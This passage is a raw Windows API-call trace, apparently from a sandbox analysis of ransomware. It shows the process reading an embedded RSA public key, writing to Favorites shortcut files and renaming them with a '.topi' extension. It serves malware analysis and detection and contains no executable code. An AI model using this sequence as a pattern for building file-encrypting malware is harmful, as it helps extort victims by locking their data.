(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.342] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.342] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.342] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.342] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.343] CloseHandle (hObject=0x6a8) returned 1 [0096.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0096.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0096.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0096.348] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.topi")) returned 1 [0096.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.349] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0096.350] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0096.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0096.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.350] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0096.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.350] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.350] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.353] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.353] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.354] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.354] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.354] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.354] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.354] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.354] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.354] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.354] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.354] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0096.355] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.355] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.355] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.355] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.355] GetLastError () returned 0x0 [0096.355] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.355] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0096.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.355] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.355] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.355] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.356] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02750 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98a0 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02798 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98b8 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.356] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98d0 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d98e8 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.357] GetCurrentThreadId () returned 0x8c4 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7bf0 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.357] GetCurrentThreadId () returned 0x8c4 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03438 [0096.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6d4bd0 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.359] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98b8 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02798 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 